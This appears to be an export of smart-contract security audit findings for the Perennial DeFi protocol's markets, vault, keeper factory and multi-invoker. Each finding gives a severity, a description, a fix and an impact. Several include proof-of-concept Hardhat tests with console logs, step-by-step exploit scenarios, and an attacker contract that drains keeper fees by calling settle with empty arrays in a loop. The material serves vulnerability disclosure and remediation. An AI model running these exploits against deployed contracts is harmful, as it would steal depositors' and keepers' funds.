true,\\n}\\noracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\noracle.status.returns([oracleVersion2, TIMESTAMP + 200])\\noracle.request.returns()\\n\\n// price moves against user, so he's at the edge of liquidation and tries to close\\n// position: latest=10, pending [t=200] = 0 (closable = 0)\\nawait market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\nconst oracleVersion3 = {\\n price: parse6decimal('92'),\\n timestamp: TIMESTAMP + 190,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\noracle.status.returns([oracleVersion3, TIMESTAMP + 300])\\noracle.request.returns()\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log("Before liquidation. Latest= " + posLatest.long + " current = " + posCurrent.long);\\n\\n// t = 205: price drops to 92, user becomes liquidatable before the pending position oracle version is commited\\n// liquidator commits unrequested price = 92 at oracle version=190, but current timestamp is already t=300\\n// liquidate. User pending positions:\\n// latest = 10\\n// pending [t=200] = 0\\n// current(liquidated) [t=300] = max possible position (2^62-1)\\nawait market.connect(user).update(user.address, 0, maxPosition, 0, 0, true)\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log("After liquidation. Latest= " + posLatest.long + " current = " + posCurrent.long);\\n\\n})\\n```\\n
When liquidating, order must decrease position:\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n- collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n+ collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder))) ||\\n+ newOrder.maker.add(newOrder.long).add(newOrder.short).gte(Fixed6Lib.ZERO)\\n)) revert MarketInvalidProtectionError();\\n```\\n
Malicious liquidator can liquidate users while increasing their position to any value including max possible 2^62-1 ignoring any collateral and position size checks. This is possible on its own, but liquidator can also craft such situation with very high probability. As a result of this action, all users will lose all their funds deposited into Market. For example, fee paid (and accured by makers) from max possible position will exceed total Market collateral balance so that the first maker will be able to withdraw all Market balance, minimal price change will create huge profit for the user, exceeding Market balance (if fee = 0) etc.
```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n
Vault leverage can be increased to any value up to min margin requirement due to incorrect `maxRedeem` calculations with closable and `LEVERAGE_BUFFER`
high
When redeeming from the vault, maximum amount allowed to be redeemed is limited by collateral required to keep the minimum vault position size which will remain open due to different factors, including `closable` value, which is a limitation on how much position can be closed given current pending positions. However, when calclulating max redeemable amount, `closable` value is multiplied by `LEVERAGE_BUFFER` value (currently 1.2):\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n\\nThe intention seems to be to allow to withdraw a bit more collateral so that leverage can increase at max by LEVERAGE_BUFFER. However, the math is totally wrong here, for example:\\nCurrent position = 12, `closable = 10`\\nMax amount allowed to be redeemed is 12 (100% of shares)\\nHowever, when all shares are withdrawn, `closable = 10` prevents full position closure, so position will remain at 12-10 = 2\\nOnce settled, user can claim all vault collateral while vault still has position of size 2 open. Claiming all collateral will revert due to this line in allocate:\\n```\\n_locals.marketCollateral = strategy.marketContexts[marketId].margin\\n .add(collateral.sub(_locals.totalMargin).muldiv(registrations[marketId].weight, _locals.totalWeight));\\n```\\n\\nSo the user can claim the assets only if remaining collateral is equal to or is greater than total margin of all markets. This means that user can put the vault into max leverage possible ignoring the vault leverage config (vault will have open position of such size, which will make all vault collateral equal the minimum margin requirement to open such position). This creates a big risk for vault liquidation and loss of funds for vault depositors.\\nAs seen from the example above, it's possible to put the vault at high leverage only if user redeems amount higher than `closable` allows (redeem amount in the closable..closable * LEVERAGE_BUFFER range). However, since deposits and redeems from the vault are settled later, it's impossible to directly create such situation (redeemable amount > closable). There is still a way to create such situation indirectly via maker limit limitation.\\nScenario:\\nMarket config leverage = 4. Existing deposits = $1K. Existing positions in underlying market are worth $4K\\nOpen maker position in underlying markets such that `makerLimit - currentMaker = $36K`\\nDeposit $11K to the vault (total deposits = $12K). The vault will try to open position of size = $48K (+$44K), however `makerLimit` will not allow to open full position, so the vault will only open +$36K (total position $40K)\\nWait until the deposit settles\\nClose maker position in underlying markets to free up maker limit\\nDeposit minimum amount to the vault from another user. This increases vault positions to $48K (settled = $40K, pending = $48K, `closable` = $40K)\\nRedeem $11K from the vault. This is possible, because maxRedeem is `closable/leverage*LEVERAGE_BUFFER` = `$40K/4*1.2` = `$12K`. However, the position will be limited by `closable`, so it will be reduced only by $40K (set to $8K).\\nWait until redeem settles\\nClaim $11K from the vault. This leaves the vault with the latest position = $8K, but only with $1K of original deposit, meaning vault leverage is now 8 - twice the value specified by config (4).\\nThis scenario will keep high vault leverage only for a short time until next oracle version, because `claim` will reduce position back to $4K, however this position reduction can also be avoided, for example, by opening/closing positions to make `long-short = maker` or `short-long = maker` in the underlying market(s), thus disallowing the vault to reduce its maker position and keeping the high leverage.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('increase vault leverage', async () => {\\n console.log("start");\\n\\n async function setOracle(latestTime: BigNumber, currentTime: BigNumber) {\\n await setOracleEth(latestTime, currentTime)\\n await setOracleBtc(latestTime, currentTime)\\n }\\n\\n async function setOracleEth(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await oracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n oracle.status.returns([newVersion, currentTime])\\n oracle.request.whenCalledWith(user.address).returns()\\n oracle.latest.returns(newVersion)\\n oracle.current.returns(currentTime)\\n oracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function setOracleBtc(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await btcOracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n btcOracle.status.returns([newVersion, currentTime])\\n btcOracle.request.whenCalledWith(user.address).returns()\\n btcOracle.latest.returns(newVersion)\\n btcOracle.current.returns(currentTime)\\n btcOracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function logLeverage() {\\n // vault collateral\\n var vaultCollateralEth = (await market.locals(vault.address)).collateral\\n var vaultCollateralBtc = (await btcMarket.locals(vault.address)).collateral\\n var vaultCollateral = vaultCollateralEth.add(vaultCollateralBtc)\\n\\n // vault position\\n var vaultPosEth = (await market.positions(vault.address)).maker;\\n var ethPrice = (await oracle.latest()).price;\\n var vaultPosEthUsd = vaultPosEth.mul(ethPrice);\\n var vaultPosBtc = (await btcMarket.positions(vault.address)).maker;\\n var btcPrice = (await btcOracle.latest()).price;\\n var vaultPosBtcUsd = vaultPosBtc.mul(btcPrice);\\n var vaultPos = vaultPosEthUsd.add(vaultPosBtcUsd);\\n var leverage = vaultPos.div(vaultCollateral);\\n console.log("Vault collateral = " + vaultCollateral.div(1e6) + " pos = " + vaultPos.div(1e12) + " leverage = " + leverage);\\n }\\n\\n await setOracle(STARTING_TIMESTAMP.add(3600), STARTING_TIMESTAMP.add(3700))\\n await vault.settle(user.address);\\n\\n // put markets at the (limit - 5000) each\\n var makerLimit = (await market.riskParameter()).makerLimit;\\n var makerCurrent = (await market.position()).maker;\\n var maker = makerLimit;\\n var ethPrice = (await oracle.latest()).price;\\n var availUsd = parse6decimal('32000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(ethPrice);\\n maker = maker.sub(availToken);\\n var makerBefore = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log("ETH Limit = " + makerLimit + " CurrentGlobal = " + makerCurrent + " CurrentUser = " + makerBefore + " price = " + ethPrice + " availToken = " + availToken + " maker = " + maker);\\n for (var i = 0; i < 5; i++)\\n await fundWallet(asset, user);\\n await market.connect(user).update(user.address, maker, 0, 0, parse6decimal('1000000'), false)\\n\\n var makerLimit = (await btcMarket.riskParameter()).makerLimit;\\n var makerCurrent = (await btcMarket.position()).maker;\\n var maker = makerLimit;\\n var btcPrice = (await btcOracle.latest()).price;\\n var availUsd = parse6decimal('8000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(btcPrice);\\n maker = maker.sub(availToken);\\n var makerBeforeBtc = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log("BTC Limit = " + makerLimit + " CurrentGlobal = " + makerCurrent + " CurrentUser = " + makerBeforeBtc + " price = " + btcPrice + " availToken = " + availToken + " maker = " + maker);\\n for (var i = 0; i < 10; i++)\\n await fundWallet(asset, btcUser1);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, maker, 0, 0, parse6decimal('2000000'), false)\\n\\n console.log("market updated");\\n\\n var deposit = parse6decimal('12000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await setOracle(STARTING_TIMESTAMP.add(3700), STARTING_TIMESTAMP.add(3800))\\n await vault.settle(user.address)\\n\\n await logLeverage();\\n\\n // withdraw the blocking amount\\n console.log("reduce maker blocking position to allow vault maker increase")\\n await market.connect(user).update(user.address, makerBefore, 0, 0, 0, false);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, makerBeforeBtc, 0, 0, 0, false);\\n\\n await setOracle(STARTING_TIMESTAMP.add(3800), STARTING_TIMESTAMP.add(3900))\\n\\n // refresh vault to increase position size since it's not held now\\n var deposit = parse6decimal('10')\\n console.log("Deposit small amount to increase position")\\n await vault.connect(user2).update(user2.address, deposit, 0, 0)\\n\\n // now redeem 11000 (which is allowed, but market position will be 2000 due to closable)\\n var redeem = parse6decimal('11500')\\n console.log("Redeeming 11500")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n // settle all changes\\n await setOracle(STARTING_TIMESTAMP.add(3900), STARTING_TIMESTAMP.add(4000))\\n await vault.settle(user.address)\\n await logLeverage();\\n\\n // claim those assets we've withdrawn\\n var claim = parse6decimal('11100')\\n console.log("Claiming 11100")\\n await vault.connect(user).update(user.address, 0, 0, claim);\\n\\n await logLeverage();\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nETH Limit = 1000000000 CurrentGlobal = 200000000 CurrentUser = 200000000 price = 2620237388 availToken = 12212633 maker = 987787367\\nBTC Limit = 100000000 CurrentGlobal = 20000000 CurrentUser = 20000000 price = 38838362695 availToken = 205981 maker = 99794019\\nmarket updated\\nVault collateral = 12000 pos = 39999 leverage = 3333330\\nreduce maker blocking position to allow vault maker increase\\nDeposit small amount to increase position\\nRedeeming 11500\\nVault collateral = 12010 pos = 8040 leverage = 669444\\nClaiming 11100\\nVault collateral = 910 pos = 8040 leverage = 8835153\\n```\\n
The formula to allow LEVERAGE_BUFFER should apply it to final position size, not to delta position size (maxRedeem returns delta to subtract from current position). Currently redeem amount it limited by: `closable * LEVERAGE_BUFFER`. Once subtracted from the current position size, we obtain:\\n`maxRedeem = closable * LEVERAGE_BUFFER / leverage`\\n`newPosition = currentPosition - closable`\\n`newCollateral = (currentPosition - closable * LEVERAGE_BUFFER) / leverage`\\n`newLeverage = newPosition / newCollateral = leverage * (currentPosition - closable) / (currentPosition - closable * LEVERAGE_BUFFER)`\\n`= leverage / (1 - (LEVERAGE_BUFFER - 1) * closable / (currentPosition - closable))`\\nAs can be seen, the new leverage can be any amount and the formula doesn't make much sense, it certainly doesn't limit new leverage factor to LEVERAGE_BUFFER (denominator can be 0, negative or any small value, meaning leverage can be any number as high as you want). I think what developers wanted, is to have:\\n`newPosition = currentPosition - closable`\\n`newCollateral = newPosition / (leverage * LEVERAGE_BUFFER)`\\n`newLeverage = newPosition / (newPosition / (leverage * LEVERAGE_BUFFER)) = leverage * LEVERAGE_BUFFER`\\nNow, the important part to understand is that it's impossible to calculate delta collateral simply from delta position like it is now. When we know target newPosition, we can calculate target newCollateral, and then maxRedeem (delta collateral) can be calculated as currentCollateral - newCollateral:\\n`maxRedeem = currentCollateral - newCollateral`\\n`maxRedeem = currentCollateral - newPosition / (leverage * LEVERAGE_BUFFER)`\\nSo the fixed collateral calculation can be something like that:\\n```\\nUFixed6 deltaPosition = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable);\\nUFixed6 targetPosition = marketContext.currentAccountPosition.maker.sub(deltaPosition); // expected ideal position\\nUFixed6 targetCollateral = targetPosition.muldiv(marketContext.latestPrice.abs(), \\n registration.leverage.mul(StrategyLib.LEVERAGE_BUFFER)); // allow leverage to be higher by LEVERAGE_BUFFER\\nUFixed6 collateral = marketContext.local.collateral.sub(targetCollateral) // delta collateral\\n .muldiv(totalWeight, registration.weight); // market collateral => vault collateral\\n```\\n
Malicious user can put the vault at very high leverage, breaking important protocol invariant (leverage not exceeding target market leverage) and exposing the users to much higher potential funds loss / risk from the price movement due to high leverage and very high risk of vault liquidation, causing additional loss of funds from liquidation penalties and position re-opening fees.
```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n
Vault max redeem calculations limit redeem amount to the smallest position size in underlying markets which can lead to very small max redeem amount even with huge TVL vault
high
When redeeming from the vault, maximum amount allowed to be redeemed is limited by current opened position in each underlying market (the smallest opened position adjusted for weight). However, if any one market has its maker close to maker limit, the vault will open very small position, limited by maker limit. But now all redeems will be limited by this very small position for no reason: when almost any amount is redeemed, the vault will attempt to increase (not decrease) position in such market, so there is no sense in limiting redeem amount to the smallest position.\\nThis issue can create huge problems for users with large deposits. For example, if the user has deposited $10M to the vault, but due to one of the underlying markets the max redeem amount is only $1, user will need to do 10M transactions to redeem his full amount (which will not make sense due to gas).\\nVault's `maxRedeem` is calculated for each market as:\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n\\n`closable` is limited by the vault's settled and current positions in the market. As can be seen from the calculation, redeem amount is limited by vault's position in the market. However, if the position is far from target due to different market limitations, this doesn't make much sense. For example, if vault has $2M deposts and there are 2 underlying markets, each with weight 1, and:\\nIn Market1 vault position is worth $1 (target position = $1M)\\nIn Market2 vault position is worth $1M (target position = $1M)\\nThe `maxRedeem` will be limited to $1, even though redeeming any amount up to $999999 will only make the vault attempt to increase position in Market1 rather than decrease.\\nThere is also an opposite situation possible, when current position is higher than target position (due to LEVERAGE_BUFFER). This will make maxredeem too high. For example, similar example to previous, but:\\nIn Market1 vault position is worth $1.2M (target position = $1M)\\nIn Market2 vault position is worth $1.2M (target position = $1M)\\nThe `maxRedeem` will be limited to $1.44M (due to LEVERAGE_BUFFER), without even comparing the current collateral (which is just $1M per market), based only on position size.
Consider calculating max redeem by comparing target position vs current position and then target collateral vs current collateral instead of using only current position for calculations. This might be somewhat complex, because it will require to re-calculate allocation amounts to compare target vs current position. Possibly max redeem should not be limited as a separate check, but rather as part of the `allocate()` calculations (reverting if the actual leverage is too high in the end)
When vault's position is small in any underlying market due to maker limit, the max redeem amount in the vault will be very small, which will force users with large deposits to use a lot of transactions to redeem it (they'll lose funds to gas) or it might even be next to impossible to do at all (if, for example, user has a deposit of $10M and max redeem = $1), in such case the redeems are basically broken and not possible to do.
```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n
Attacker can call `KeeperFactory#settle` with empty arrays as input parameters to steal all keeper fees
high
Anyone can call `KeeperFactory#request`, inputting empty arrays as parameters, and the call will succeed, and the caller receives a fee.\\nAttacker can perform this attack many times within a loop to steal ALL keeper fees from protocol.\\nExpected Workflow:\\nUser calls `Market#update` to open a new position\\nMarket calls `Oracle#request` to request a new oracleVersion\\nThe User's account gets added to a callback array of the market\\nOnce new oracleVersion gets committed, keepers can call `KeeperFactory#settle`, which will call `Market#update` on accounts in the Market's callback array, and pay the keeper(i.e. caller) a fee.\\n`KeeperFactory#settle` call will fail if there is no account to settle(i.e. if callback array is empty)\\nAfter settleing an account, it gets removed from the callback array\\nThe issue:\\nHere is KeeperFactory#settle function:\\n```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, "")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n\\nAs we can see, function does not check if the length of the array is 0, so if user inputs empty array, the for loop will not be entered, but the keeper still receives a fee via the `keep` modifier.\\nAttacker can have a contract perform the attack multiple times in a loop to drain all fees:\\n```\\ninterface IKeeperFactory{\\n function settle(bytes32[] memory ids,IMarket[] memory markets,uint256[] memory versions,uint256[] memory maxCounts\\n ) external;\\n}\\n\\ninterface IMarket(\\n function update()external;\\n)\\n\\ncontract AttackContract{\\n\\n address public attacker;\\n address public keeperFactory;\\n IERC20 public keeperToken;\\n\\n constructor(address perennialDeployedKeeperFactory, IERC20 _keeperToken){\\n attacker=msg.sender;\\n keeperFactory=perennialDeployedKeeperFactory;\\n keeperToken=_keeperToken;\\n }\\n\\n function attack()external{\\n require(msg.sender==attacker,"not allowed");\\n\\n bool canSteal=true;\\n\\n // empty arrays as parameters\\n bytes32[] memory ids=[];\\n IMarket[] memory markets=[];\\n uint256[] versions=[];\\n uint256[] maxCounts=[];\\n\\n // perform attack in a loop till all funds are drained or call reverts\\n while(canSteal){\\n try IKeeperFactory(keeperFactory).settle(ids,markets,versions,maxCounts){\\n //\\n }catch{\\n canSteal=false;\\n }\\n }\\n keeperToken.transfer(msg.sender, keeperToken.balanceOf(address(this)));\\n }\\n}\\n```\\n
Within KeeperFactory#settle function, revert if ids.length==0:\\n```\\nfunction settle(\\n bytes32[] memory ids,\\n IMarket[] memory markets,\\n uint256[] memory versions,\\n uint256[] memory maxCounts\\n)external keep(settleKeepConfig(), msg.data, 0, "") {\\n if (\\n++++ ids.length==0 ||\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n ) revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n
All keeper fees can be stolen from protocol, and there will be no way to incentivize Keepers to commitRequested oracle version, and other keeper tasks
```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, "")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n
MultiInvoker doesn't pay keepers refund for l1 calldata
medium
MultiInvoker doesn't pay keepers refund for l1 calldata, as result keepers can be not incentivized to execute orders.\\nMultiInvoker contract allows users to create orders, which then can be executed by keepers. For his job, keeper receives fee from order's creator. This fee payment is handled by `_handleKeep` function.\\nThe function will call `keep` modifier and will craft `KeepConfig` which contains `keepBufferCalldata`, which is flat fee for l1 calldata of this call.\\n```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n\\nThis modifier should calculate amount of tokens that should be refunded to user and then raise it. We are interested not in whole modifier, but in calldata handling. To do that we call `_calldataFee` function. This function does nothing in the `Kept` contract and is overrided in the `Kept_Arbitrum` and `Kept_Optimism`.\\nThe problem is that MultiInvoker is only one and it just extends `Keept`. As result his `_calldataFee` function will always return 0, which means that calldata fee will not be added to the refund of keeper.
You need to implement 2 versions of MultiInvoker: for optimism(Kept_Optimism) and arbitrum(Kept_Arbitrum).
Keeper will not be incentivized to execute orders.
```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n
It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no cost
medium
In 2.0 audit the issue 104 was fixed but not fully and it's still possible, in a slightly different way. This wasn't found in the fix review contest. The fix introduced margined and maintained amounts, so that margined amount is higher than maintained one. However, when collateral is withdrawn, only the current (pending) position is checked by margined amount, the largest position (including latest settled) is checked by maintained amount. This still allows to withdraw funds up to the edge of being liquidated, if margined current position amount <= maintained settled position amount. So the new way to liquidate your own position is to reduce your position and then do the same as in 2.0 issue.\\nThis means that it's possible to be at almost liquidation level intentionally and moreover, the current oracle setup allows to open and immediately liquidate your own position in 1 transaction, effectively bypassing efficiency and liquidity removal limits, paying only the keeper (and possible position open/close) fees, causing all kinds of malicious activity which can harm the protocol.\\n`Market._invariant` verifies margined amount only for the current position:\\n```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n\\nAll the other checks (max pending position, including settled amount) are for maintained amount:\\n```\\nif (\\n !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThe user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done only on existing settled position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Reduce your position by `(margin / maintenance)` and make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount. Position reduction makes margined(current position) = maintained(settled position), so it's possible to withdraw up to be at the edge of liquidation. 3.2. Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).
If collateral is withdrawn or order increases position, verify `maxPendingMagnitude` with `margined` amount. If position is reduced or remains unchanged AND collateral is not withdrawn, only then `maxPendingMagnitude` can be verified with `maintained` amount.
There are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nCombine with the other issues for more severe effect to be able to abuse them in 1 transaction (for example, make `closable = 0` and liquidate your position while increasing to max position size of 2^62-1 - all in 1 transaction)\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). This will cause some chaos in the market, disbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.
```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n
Invalid oracle version can cause the `maker` position to exceed `makerLimit`, temporarily or permanently bricking the Market contract
medium
When invalid oracle version happens, positions pending at the oracle version are invalidated with the following pending positions increasing or decreasing in size. When this happens, all position limit checks are not applied (and can't be cancelled/modified), but they are still verified for the final positions in _invariant. This means that many checks are bypassed during such event. There is a protection against underflow due to this problem by enforcing the calculated `closable` value to be 0 or higher. However, exactly the same problem can happen with overflow and there is no protection against it.\\nFor example:\\nLatest global maker = maker limit = 1000\\nPending global maker = 500 [t=100]\\nPending global maker = 1000 [t=200]\\nIf oracle version at t = 100 is invalid, then pending global maker = 1500 (at t = 200). However, due to this check in _invariant:\\n```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n\\nall Market updates will revert except update to reduce maker position by 500+, which might not be even possible in 1 update depending on maker distribution between users. For example, if 5 users have maker = 300 (1500 total), then no single user can update to reduce maker by 500. This will temporarily brick Market (all updates will revert) until coordinator increases maker limit. If the limit is already close to max possible (2^62-1), then the contract will be bricked permanently (all updates will revert regardless of maker limit, because global maker will exceed 2^62-1 in calculations and will revert when trying to store it).\\nThe same issue can also cause the other problems, such as:\\nBypassing the market utilization limit if long/short is increased above maker\\nUser unexpectedly becomes liquidatable with too high position (for example: position 500 -> pending 0 -> pending 500 - will make current = 1000 if middle oracle version is invalid)
The same issue for underflow is already resolved by using `closable` and enforcing such pending positions that no invalid oracle can cause the position to be less than 0. This issue can be resolved in the same way, by introducing some `opeanable` value (calculated similar to `closable`, but in reverse - when position is increased, it's increased, when position is decreased, it doesn't change) and enforcing different limits, such that settled position + openable:\\ncan not exceed the max maker\\ncan not break utilization\\nfor local position - calculate maxMagnitude amount from `settled + local openable` instead of absolute pending position values for margined/maintained calculations.
If current maker is close to maker limit, and some user(s) reduce their maker then immediately increase back, and the oracle version is invalid, maker will be above the maker limit and the Market will be temporarily bricked until coordinator increases the maker limit. Even though it's temporary, it still bricked for some time and coordinator is forced to increase maker limit, breaking the intended market config. Furthermore, once the maker limit is increased, there is no guarantee that the users will reduce it so that the limit can be reduced back.\\nAlso, for some low-price tokens, the maker limit can be close to max possible value (2^62-1 is about `4*1e18` or Fixed6(4*1e12)). If the token price is about $0.00001, this means such maker limit allows `$4*1e7` or $40M. So, if low-value token with $40M maker limit is used, this issue will lead to maker overflow 2^62-1 and bricking the Market permanently, with all users being unable to withdraw their funds, losing everything.\\nWhile this situation is not very likely, it's well possible. For example, if the maker is close to limit, any maker reducing the position will have some other user immediately take up the freed up maker space, so things like global maker change of: 1000->900->1000 are easily possible and any invalid oracle version will likely cause the maker overflowing the limit.
